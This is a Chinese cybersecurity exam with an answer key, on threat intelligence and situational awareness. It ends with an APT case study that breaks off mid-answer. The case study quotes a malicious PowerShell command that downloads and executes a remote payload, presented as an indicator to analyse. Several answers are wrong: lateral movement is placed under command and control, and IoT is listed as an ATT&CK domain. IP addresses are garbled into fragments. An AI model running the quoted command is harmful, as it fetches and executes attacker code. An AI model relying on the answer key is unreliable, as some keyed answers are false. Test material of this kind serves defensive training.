2025年网络安全态势感知与威胁情报培训试卷及答案

2025年网络安全态势感知与威胁情报培训试卷及答案一、单项选择题（每题2分，共20分）1.以下哪项不属于网络安全态势感知的核心组件？A.数据采集层B.威胁情报库C.可视化展示平台D.物理设备巡检系统2.威胁情报按粒度可分为战略级、战术级和操作级，其中战术级情报的典型输出形式是？A.《2025年APT攻击趋势白皮书》B.具体攻击IP地址与恶意文件哈希值C.攻击者使用的C2服务器通信协议特征D.行业客户面临的主要威胁类型分析报告3.某企业部署态势感知系统时，发现内网流量中存在大量ICMP小包（<64字节）定向发送至非业务主机，最可能的攻击场景是？A.DNS隧道数据外发B.网络蠕虫横向扫描C.钓鱼邮件附件下载D.勒索软件加密进程4.STIX2.1标准中，用于描述“攻击者使用的恶意软件”的对象类型是？A.Indicator（指标）B.Malware（恶意软件）C.AttackPattern（攻击模式）D.Campaign（攻击活动）5.以下哪项技术最适合用于检测未知威胁的“行为异常”？A.基于特征库的入侵检测（IDS）B.基于机器学习的流量行为分析C.基于规则的防火墙策略过滤D.基于漏洞库的补丁管理系统6.威胁情报生命周期中，“将分析结果转化为可操作指令（如防火墙规则、杀软特征）”属于哪个阶段？A.收集（Collection）B.分析（Analysis）C.传播（Dissemination）D.应用（Application）7.MITREATT&CK框架中，“横向移动（LateralMovement）”属于哪个战术阶段？A.初始访问（InitialAccess）B.执行（Execution）C.持久化（Persistence）D.命令与控制（CommandandControl）8.某金融机构态势感知平台发现，内网某服务器连续3天在凌晨2点向境外IP（00为示例，实际应为公网IP）发送HTTPPOST请求，请求体包含加密字符串。最合理的下一步操作是？A.立即封禁该境外IPB.提取请求流量进行深度解析（如解密、协议分析）C.重启服务器观察是否恢复正常D.向员工发送通知提醒防范钓鱼邮件9.以下哪项是威胁情报“可信度（Confidence）”评估的关键依据？A.情报来源的权威性（如CISA、FireEye）B.情报中包含的IOC数量（如IP、哈希）C.情报发布的时间（是否为最新）D.情报与企业业务场景的相关性10.云环境下的态势感知与传统数据中心的最大差异在于？A.需重点监控虚拟网络流量（vSwitch、VXLAN）B.无需关注物理服务器日志C.威胁情报仅需关注云厂商提供的默认规则D.数据采集只需接入云平台API接口二、填空题（每空1分，共20分）1.网络安全态势感知的核心三要素是感知、理解和________。2.威胁情报平台（TIP）的核心功能包括情报聚合、________、________和可视化展示。3.ATT&CK框架分为企业网络（Enterprise）、________和________三个子域。4.常见的日志标准化格式包括CEF（通用事件格式）和________（Syslog的扩展格式）。5.流量镜像技术中，SPAN（端口镜像）与RSPAN（远程端口镜像）的主要区别是________。6.恶意软件分析中，“沙箱（Sandbox）”的核心作用是________。7.威胁情报的“可行动性（Actionable）”要求情报能直接转化为________或________（如防火墙规则、EDR策略）。8.态势感知系统中，“告警降噪”的常用方法包括________（如合并重复告警）和________（如基于业务场景的优先级排序）。9.APT（高级持续性威胁）的典型特征包括________、________和长期潜伏。10.2025年新兴威胁中，“AI生成钓鱼内容”的主要技术手段是________（如GPT4及以上模型）和________（如深度伪造语音/图像）。三、简答题（每题8分，共40分）1.简述网络安全态势感知系统中“数据采集层”的主要技术手段及各自适用场景。2.对比战略级威胁情报与操作级威胁情报的区别（需从目标对象、内容深度、应用方式三方面说明）。3.说明STIX/TAXII协议在威胁情报共享中的作用（需解释STIX和TAXII的具体功能）。4.某企业态势感知平台检测到内网主机存在“异常DNS查询”（如查询大量随机子域名），请分析可能的攻击场景及对应的排查步骤。5.结合2025年技术趋势，阐述AI技术在威胁情报分析中的具体应用（至少列举3个场景）。四、案例分析题（20分）背景：某制造企业（以下简称A公司）部署了网络安全态势感知系统（以下简称S平台），2025年3月15日，S平台触发以下告警：告警1：3月14日22:0023:00，研发部主机PC001向境外IP（5）发送500+次DNS查询，查询内容为随机8位字母组合（如“”“”）。告警2：3月15日02:10，PC001通过443端口与5建立TCP连接，传输数据量约1.2MB。告警3：3月15日02:30，PC001的进程“svchost.exe”（PID:1234）调用powershell执行命令：`powershellc"IEX(NewObjectNet.WebClient).DownloadString('5/payload')"`。关联日志：PC001于3月14日18:30接收一封主题为“2025年产品需求确认”的邮件，附件为“需求文档.docx”，哈希值为`a1b2c3d4e5f6a7b8c9d0e1f2a3b4c5d6`。要求：根据以上信息，完成以下分析：（1）判断攻击场景的类型（如APT、勒索软件、数据外发等），并说明依据。（5分）（2）提取关键IOC（指标），包括IP、文件哈希、域名特征等。（5分）（3）结合威胁情报分析，推测攻击者可能使用的技术（需对应MITREATT&CK战术/技术）。（5分）（4）提出后续响应措施（至少4项）。（5分）答案一、单项选择题1.D（物理设备巡检属于运维范畴，非态势感知核心）2.C（战术级情报聚焦攻击技术细节，如协议特征）3.B（ICMP小包定向扫描是蠕虫横向移动的典型行为）4.B（STIX中Malware对象描述恶意软件）5.B（机器学习通过行为建模检测未知异常）6.D（应用阶段将情报转化为防护指令）7.D（横向移动属于命令与控制前的战术阶段）8.B（需先解析流量内容，避免误封）9.A（来源权威性是可信度核心依据）10.A（云环境需重点监控虚拟网络流量）二、填空题1.预测2.清洗过滤、关联分析3.移动设备（Mobile）、物联网（IoT）4.LEEF（日志事件扩展格式）5.RSPAN支持跨交换机镜像，SPAN仅支持本地6.在隔离环境中观察恶意软件行为7.防护策略、检测规则8.规则合并、场景化优先级9.目标明确性、资源专业性10.大语言模型（LLM）、多模态生成三、简答题1.数据采集层技术手段及场景：流量镜像（SPAN/RSPAN）：适用于交换机级别的网络流量采集（如核心交换机、边界路由器）。日志拉取（Syslog/API）：适用于设备（如防火墙、IDS）、服务器（如WindowsEventLog）的结构化日志采集。端点探针（Agent）：适用于主机级行为采集（如进程调用、文件操作），需安装轻量级代理。威胁情报接口（如MISP/TAXII）：适用于外部威胁数据（如IOC、攻击模式）的实时同步。2.战略级与操作级威胁情报对比：目标对象：战略级面向企业管理层（如CEO、安全总监），操作级面向一线安全运维人员（如SOC分析师）。内容深度：战略级侧重趋势分析（如“2025年制造业APT攻击增长30%”），操作级侧重具体指标（如“C2服务器IP:5，恶意文件哈希:a1b2c3...”）。应用方式：战略级用于安全预算分配、风险策略调整；操作级用于直接阻断攻击（如封禁IP、更新杀软特征）。3.STIX/TAXII的作用：STIX（结构化威胁信息表达）：定义威胁情报的标准化数据模型（如攻击模式、恶意软件、指标），解决情报格式混乱问题。TAXII（可信自动交换协议）：定义情报共享的通信协议（如推送/拉取、订阅），支持不同组织间的自动化情报交换。二者结合实现“机器可读、自动共享”，提升情报利用效率。4.异常DNS查询的攻击场景与排查步骤：可能场景：C2服务器域名生成算法（DGA）通信（攻击者通过随机子域名绕过DNS封锁）；恶意软件尝试连接C2服务器。排查步骤：①提取DNS查询日志，统计域名生成规律（如是否符合DGA算法特征）；②反向查询境外IP的注册信息（如WHOIS、历史解析记录）；③检查主机是否存在异常进程（如非系统自带的DNS客户端）；④结合沙箱分析主机近期下载的文件，确认是否包含DGA模块。5.AI在威胁情报分析中的应用：自动化情报清洗：通过NLP技术从非结构化文本（如威胁报告、论坛帖子）中提取关键IOC（如IP、哈希），降低人工标注成本。未知威胁预测：基于历史攻击数据训练模型，预测攻击者可能使用的新技术（如针对量子加密的攻击方法）。行为异常检测：通过图神经网络（GNN）分析主机/用户行为图，识别隐藏的横向移动路径（如“主机A→B→C”的非业务逻辑访问）。四、案例分析题（1）攻击场景类型：APT攻击（高级持续性威胁）。依据：攻击过程分阶段（钓鱼邮件投递→DNS探测→C2通信→恶意代码执行），且攻击者使用了DGA域名（随机子域名）和混淆命令（powershellIEX下载），符合APT长期潜伏、隐蔽通信的特征。（2）关键IOC：IP地址：5（C2服务器）；文件哈希：a1b2c3d4e5f6a7b8c9d0e1f2a3b4c5d6（恶意文档附件）；域名特征：随机8位字母组合的DNS查询（DGA生成）；进程命令：`powershellc"IEX(NewObjectNet.WebClient).DownloadString('5/payload')"`（恶意代码加载命令）。（3）MITREATT&CK技术对应：初始访问（InitialAccess）：钓鱼邮件（T1566.001，鱼叉式网络钓鱼）；执行（Execution）：PowerShell执行（T1059.001，PowerShell）；命令与控制（CommandandControl）：DGA域名（T1568.002，域名生成算法）、HTTPS通信（T1071.001，应用层协议）。（4）后续响应措施：①隔离PC001（断开网络连接），防止恶意代码扩